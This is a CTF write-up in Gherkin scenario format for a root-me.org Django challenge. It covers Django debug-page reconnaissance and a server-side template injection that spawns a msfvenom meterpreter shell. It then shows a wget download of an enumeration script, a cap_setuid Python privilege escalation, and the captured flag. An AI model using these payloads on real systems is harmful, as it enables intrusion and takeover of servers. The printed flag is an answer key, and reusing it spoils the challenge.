## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Realist, CTF
  User:
    mr_once
  Goal:
    Capture the flag

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
    | Metasploit      | v5.0.99-dev |
  Machine information:
    Given I am accessing the machine at http://ctf16.root-me.org/
    And is an app running on Django

  Scenario: Fail:Template injection
    Given that the app is running on Django
    When I try a template injection while adding a new task to the list
    """
    {{1+1}}
    """
    Then I can see it do not work [evidence](templatefail.png)

  Scenario: Success:Get info from robots.txt
    Given the template injection did not work
    When I go to
    """
    http://ctf16.root-me.org/robots.txt
    """
    Then I can see that the file "robots.txt" does not exist
    But since the app is being run with "debug=True" I can see
    """
    Using the URLconf defined in challengedjango.urls, Django tried these URL\
      patterns, in this order:
    admin/
    add-task [name='add']
    task/<int:todo_id> [name='view']
    task [name='save']
    edit-task [name='edit']
    [name='index']

    The current path, robots.txt, didn't match any of these.
    """

  Scenario: Fail:admin panel
    Given I found "/admin" above
    When I go to
    """
    http://ctf16.root-me.org/admin/
    """
    Then I can see an login section [evidence](admin.png)
    And I try some SQLi
    But it does not  work

  Scenario: Success:Template injection in task
    Given the SQLi on the admin panel did not work
    When I try to edit a task
    """
    http://ctf16.root-me.org/task/2
    """
    Then I try again a template injection
    """
    {{1+1}}
    """
    And I can see that thist time it works [evidence](injected.png)

  Scenario: Success:Get a remote shell
    Given that I found a template injection
    And I generate a payload using "msfvenom"
    """
    $ msfvenom -p python/meterpreter/bind_tcp LPORT=4446 -f raw > exp.py
    """
    And I create the exploit
    """
    {{ "".__class__.__mro__[1].__subclasses__()[194]("python -c \"EXPLOIT\"",\
    shell=True,stdout=-1).communicate() }}
    """
    And after replacing "EXPLOIT" with the ouptut of "msfvenom"
    And set the handler with "metasploit"
    """
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload python/meterpreter/bind_tcp
    msf5 exploit(multi/handler) > set LPORT 4446
    msf5 exploit(multi/handler) > set RHOST ctf16.root-me.org
    msf5 exploit(multi/handler) > exploit
    """
    When I send the exploit
    Then I get a meterpreter session
    And I get a shell [evidence](shell.png)

  Scenario: Fail:db.sqlite3
    Given now I have a shell
    And I found a "db.sqlit3" file
    And aftter downloading it I try to see its content
    """
    $ sqlite3 db.sqlite3
    sqlite> .tables
    auth_group                  django_admin_log
    auth_group_permissions      django_content_type
    auth_permission             django_migrations
    auth_user                   django_session
    auth_user_groups            vulnapp_todo
    auth_user_user_permissions
    """
    And after looking around I can't see any useful information

  Scenario: Success:Enumeration
    Given that I found nothing in the "db.sqlite3"
    When I try to do a enumeration on the system
    And I download the script "lse.sh"
    """
    $ cd /tmp
    $ wget https://raw.githubusercontent.com/diego-treitos/\
      linux-smart-enumeration/master/lse.sh
    """
    When I run the script
    """
    $ sh lse.sh -l1
    """
    Then I can see some file with "capabilities" [evidence](capabilities.png)
    And I look how those files work

  Scenario: Success:Exploit capability file
    Given after learning how files with capabilities on linux work
    And since I can see that "python3.7" has the following capabilities
    """
    /usr/bin/python3.7 = cap_setuid,cap_net_bind_service+ep
    """
    When I try
    """
    $ /usr/bin/python3.7
    Python 3.7.2 (default, Jan 10 2019, 23:51:51)
    [GCC 8.2.1 20181127] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import os
    >>> os.setuid(0)
    >>> os.system("id")
    uid=0(root) gid=1000(user) groups=1000(user)
    0
    """
    Then I can read the flag
    """
    >>> os.system("cat /passwd")
    b59cc0c0975c21ac4644357c44c7f5d4
    """
    And I solve the challenge
